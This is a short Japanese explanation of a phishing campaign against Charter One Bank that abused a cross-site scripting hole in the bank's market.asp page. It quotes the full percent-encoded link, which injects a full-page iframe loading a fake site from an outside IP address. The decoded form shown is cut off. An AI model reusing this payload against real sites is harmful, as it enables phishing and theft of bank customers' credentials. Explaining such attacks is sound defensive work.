クロスサイトスクリプティング
今年5月に出回ったCharter One Bankのフィッシングは、クロスサイトスクリプティングの脆弱性を悪用したものだった。
「Account Error」と題されたメールには次のようなリンクがある。www.charterone.comはCharter One Bankの本物のサイト。
http://www.charterone.com/cards/market.asp?code=%22%3E%3Ciframe+style%3D%22top%3A0%3B+left%3A0%3B+position%3Aabsolute%3B%22+FRAMEBORDER%3D%220%22+BORDER%3D%220%22+width%3D1000+height%3D600+src%3D%22http%3A%2F%2F62.193.220.52/charter%2F%22%3E
パーセントエンコーディングされている部分をデコーディングすると、
">
となり、market.aspにパラメータとしてIFRAME要素を渡していることがわかる。market.aspは、これを適切に処理せず、利用者のブラウザにそのまま渡してしまう。その結果、src属性に設定された偽サイトのコンテンツが表示される。